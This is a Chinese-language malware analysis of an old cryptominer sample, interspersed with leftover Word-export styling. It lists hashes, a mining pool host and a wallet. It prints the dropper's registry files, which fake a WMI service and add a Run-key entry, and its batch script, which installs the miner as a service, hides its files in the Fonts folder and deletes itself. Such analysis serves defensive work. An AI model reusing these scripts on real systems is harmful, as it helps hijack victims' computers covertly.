@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Calibri";
}
@font-face{
font-family:"Calibri Light";
}
@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.2500pt;text-indent:-21.2500pt;font-family:‘Times New Roman‘;}
@list l0:level2{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:49.6000pt;text-indent:-28.3500pt;font-family:‘Times New Roman‘;}
@list l0:level3{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2.%3";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:70.9000pt;text-indent:-28.3500pt;font-family:‘Times New Roman‘;}
@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2.%3.%4";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:99.2000pt;text-indent:-35.4000pt;font-family:‘Times New Roman‘;}
@list l0:level5{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2.%3.%4.%5";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:127.5500pt;text-indent:-42.5000pt;font-family:‘Times New Roman‘;}
@list l0:level6{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2.%3.%4.%5.%6";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:163.0000pt;text-indent:-56.7000pt;font-family:‘Times New Roman‘;}
@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2.%3.%4.%5.%6.%7";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:191.3500pt;text-indent:-63.8000pt;font-family:‘Times New Roman‘;}
@list l0:level8{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2.%3.%4.%5.%6.%7.%8";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:219.7000pt;text-indent:-70.9000pt;font-family:‘Times New Roman‘;}
@list l0:level9{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2.%3.%4.%5.%6.%7.%8.%9";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:255.1000pt;text-indent:-85.0000pt;font-family:‘Times New Roman‘;}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
mso-pagination:none;
text-align:justify;
text-justify:inter-ideograph;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
mso-font-kerning:1.0000pt;
}
h1{
mso-style-name:"标题 1";
mso-style-next:正文;
margin-top:17.0000pt;
margin-bottom:16.5000pt;
page-break-after:avoid;
mso-pagination:lines-together;
text-align:justify;
text-justify:inter-ideograph;
mso-outline-level:1;
line-height:240%;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-weight:bold;
font-size:22.0000pt;
mso-font-kerning:22.0000pt;
}
h2{
mso-style-name:"标题 2";
mso-style-noshow:yes;
mso-style-next:正文;
margin-top:13.0000pt;
margin-bottom:13.0000pt;
page-break-after:avoid;
mso-pagination:lines-together;
text-align:justify;
text-justify:inter-ideograph;
mso-outline-level:2;
line-height:173%;
font-family:‘Calibri Light‘;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-weight:bold;
font-size:16.0000pt;
mso-font-kerning:1.0000pt;
}
span.10{
font-family:Calibri;
}
span.15{
font-family:Calibri;
color:rgb(5,99,193);
text-decoration:underline;
text-underline:single;
}
span.16{
font-family:Calibri;
}
p.17{
mso-style-name:文档属性(绿盟科技);
mso-style-parent:文档属性标题(绿盟科技);
margin-left:2.5000pt;
mso-para-margin-left:0.5000gd;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-weight:normal;
font-size:9.0000pt;
}
p.18{
mso-style-name:文档属性标题(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-weight:bold;
font-size:9.0000pt;
}
p.19{
mso-style-name:"TOC Heading";
mso-style-noshow:yes;
mso-style-parent:"标题 1";
mso-style-next:正文;
margin-top:12.0000pt;
margin-bottom:0.0000pt;
page-break-after:avoid;
mso-pagination:widow-orphan lines-together;
text-align:left;
line-height:107%;
font-family:‘Calibri Light‘;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
color:rgb(46,117,181);
font-weight:normal;
font-size:16.0000pt;
}
p.MsoToc1{
mso-style-name:"目录 1";
mso-style-noshow:yes;
mso-style-next:正文;
margin:0pt;
margin-bottom:.0001pt;
mso-pagination:none;
text-align:justify;
text-justify:inter-ideograph;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
mso-font-kerning:1.0000pt;
}
p.MsoFooter{
mso-style-name:页脚;
mso-style-noshow:yes;
margin:0pt;
margin-bottom:.0001pt;
layout-grid-mode:char;
mso-pagination:none;
text-align:left;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
mso-font-kerning:1.0000pt;
}
p.MsoToc2{
mso-style-name:"目录 2";
mso-style-noshow:yes;
mso-style-next:正文;
margin-left:21.0000pt;
mso-para-margin-left:2.0000gd;
mso-pagination:none;
text-align:justify;
text-justify:inter-ideograph;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
mso-font-kerning:1.0000pt;
}
p.MsoHeader{
mso-style-name:页眉;
mso-style-noshow:yes;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
mso-pagination:none;
text-align:center;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
mso-font-kerning:1.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
table.MsoNormalTable{
mso-style-name:普通表格;
mso-style-parent:"";
mso-style-noshow:yes;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;
mso-para-margin:0pt;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-family:‘Times New Roman‘;
font-size:10.0000pt;
mso-ansi-language:#0400;
mso-fareast-language:#0400;
mso-bidi-language:#0400;
}
table.MsoTableGrid{
mso-style-name:网格型;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;
mso-border-top-alt: 1px solid windowtext;
mso-border-left-alt: 1px solid windowtext;
mso-border-bottom-alt: 1px solid windowtext;
mso-border-right-alt: 1px solid windowtext;
mso-border-insideh: 1px solid windowtext;
mso-border-insidev: 1px solid windowtext;
mso-para-margin:0pt;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-family:‘Times New Roman‘;
font-size:10.0000pt;
mso-ansi-language:#0400;
mso-fareast-language:#0400;
mso-bidi-language:#0400;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
margin-top:104.9000pt;
margin-bottom:59.5500pt;
margin-left:85.0500pt;
margin-right:85.0500pt;
size:595.3000pt 841.9000pt;
layout-grid:15.6000pt;
}
div.Section0{page:Section0;}@page Section1{
margin-top:72.0000pt;
margin-bottom:72.0000pt;
margin-left:90.0000pt;
margin-right:90.0000pt;
size:595.3000pt 841.9000pt;
layout-grid:15.6000pt;
}
div.Section1{page:Section1;}@page Section2{
margin-top:72.0000pt;
margin-bottom:72.0000pt;
margin-left:90.0000pt;
margin-right:90.0000pt;
size:595.3000pt 841.9000pt;
layout-grid:15.6000pt;
}
div.Section2{page:Section2;}
0x00 概述
本来是想分析一下Sodinokibi病毒的新的变种,但是分析了一部分,被他的混淆和循环弄得有点头疼,东西还都是压在内存里。偶然翻到几年前的一个样本分析,又重新看了一下,发现自己在逆向这块几年了,也没实质性的提升,真是光阴喂了狗。这个样本是一个挖矿样本,那时候的样本挖矿还是直接CUP干到100%,还没有后来样本那样CUP占用率可配置。整体的恶意样本思路也比较清晰就是挖矿赚钱,尽量让管理员没有办法追踪,及时定位到了恶意程序了也让他不容啥掉。
1.1 基本信息
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
@font-face{
font-family:"Helvetica";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
p.16{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
table.MsoNormalTable{
mso-style-name:普通表格;
mso-style-parent:"";
mso-style-noshow:yes;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;
mso-para-margin:0pt;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-family:‘Times New Roman‘;
font-size:10.0000pt;
mso-ansi-language:#0400;
mso-fareast-language:#0400;
mso-bidi-language:#0400;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
|
文件名 |
explorer.exe |
|
文件大小 |
5455872 KB |
|
文件MD5 |
721e7123e2a413fb8fd4dc6262473f57 |
|
文件SHA1 |
89c8b778d6f56a7974357cc104ccdcb51169d907 |
|
文件SHA256 |
3966f7a96536ac2435056d0860ecb8fbc3cf52f665c48fa303149bc423fe6d3a |
|
文件CRC |
70AB0903 |
|
文件类型 |
exe |
1.2 分析环境
| 系统 | win7 x64 |
| 软件 | IDA,OD |
0x01 功能描述
样本要是的功能是释放各种文件,其中包括挖矿客户端,守护程序及其他的痕迹清除,权限驻留等操作脚本。样本的目的就是给矿池wakuang.aimezi.com,钱包地址:49oJQsyUYU5GuH9hKDhdQhXvCZJT92pr27RzhmMY4uhyjSEoMXom6ciBbC4kTpwUitcXbahCuFqW6dvUr9kcBzKA8iYXics进行挖矿。
0x02 样本调试分析
1.查壳。样本没有进行加壳。
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level2{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%2)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:42.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level3{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%3.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:63.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%4.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:84.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level5{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%5)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:105.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level6{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%6.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:126.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%7.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:147.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level8{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%8)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:168.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level9{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%9.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:189.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level2{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%2)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:42.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level3{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%3.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:63.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%4.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:84.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level5{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%5)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:105.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level6{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%6.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:126.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%7.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:147.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level8{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%8)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:168.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level9{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%9.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:189.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
2.样本创建投放文件
对样本动态调试检测,发现样本创建并投放了5个恶意文件,其一就是创建投放conhosts.exe文件即挖矿的客户端程序。
二是创建并投放server.reg,
Server.reg内容
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ServiceMains]
"Description"="Performance library information from Windows Management Instrumentation (WMI) providers to clients on the network. This service only runs when Performance Data Helper is activated."
"DisplayName"="WMI Adapter Services"
其三是创建并投放restart.reg
restart.reg内容
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Tomcat"=""C:\\Windows\\system\\svchost.exe"
其四是释放恶意的csrss.exe程序,对挖矿客户端(conhosts.exe)有守护作用。
并建立了相应的注册表项
其五是创建并投放1.bat。
1.bat内容如下所示,通过1.bat的内容可以知道,脚本的作用是启动挖矿客户端,启动相关恶意程序,并完成相关脚本的删除工作。
@csrss.exe install WindowsATE conhosts -a cryptonight -o stratum+tcp://wakuang.aimezi.com:7777 -u 49oJQsyUYU5GuH9hKDhdQhXvCZJT92pr27RzhmMY4uhyjSEoMXom6ciBbC4kTpwUitcXbahCuFqW6dvUr9kcBzKA8iYXics -p x -nofee 1 -dbg -1 -t 1
@csrss.exe start WindowsATE
@C:\Windows\regedit /s server.reg
@C:\Windows\regedit /s restart.reg
@del server.reg
@del restart.reg
@attrib +s +h C:\Windows\Fonts\conhosts.exe
@attrib +s +h C:\Windows\Fonts\libcurl.dll
@attrib +s +h C:\Windows\Fonts\libeay32.dll
@attrib +s +h C:\Windows\Fonts\libgcc_s_seh-1.dll
@attrib +s +h C:\Windows\Fonts\libstdc++-6.dll
@attrib +s +h C:\Windows\Fonts\libwinpthread-1.dll
@attrib +s +h C:\Windows\Fonts\ssleay32.dll.dll
@attrib +s +h C:\Windows\Fonts\msvcr71.dll
@attrib +s +h C:\Windows\Fonts\csrss.dll
@attrib +s +h C:\Windows\Fonts\zlib1.dll
@del %0
3. 创建安装服务启动项,在逆向代码中的可以看到,安装了WindowsATE服务项。
4.清除日志操作。从样本的静态及动态分析结果来看,样本在运行的时候会执行清除日志的命令。
通过ida的静态分析也发现了相关的日志清除日志
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level2{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%2)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:42.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level3{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%3.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:63.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%4.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:84.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level5{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%5)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:105.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level6{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%6.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:126.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%7.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:147.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level8{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%8)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:168.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level9{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%9.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:189.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
5.启动挖矿客户端的命令行代码,矿池地址,通信端口等。 对样本进行逆向,可以看到启动客户端的地址,端口等信息。
0x03 总结
就是一个简单的挖矿样本分析,当时这个样本出现的时候,正式struts2漏洞大杀四方的时候,很多都是通过struts2漏洞进行投放的。
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
@font-face{
font-family:"Consolas";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
@font-face{
font-family:"Consolas";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
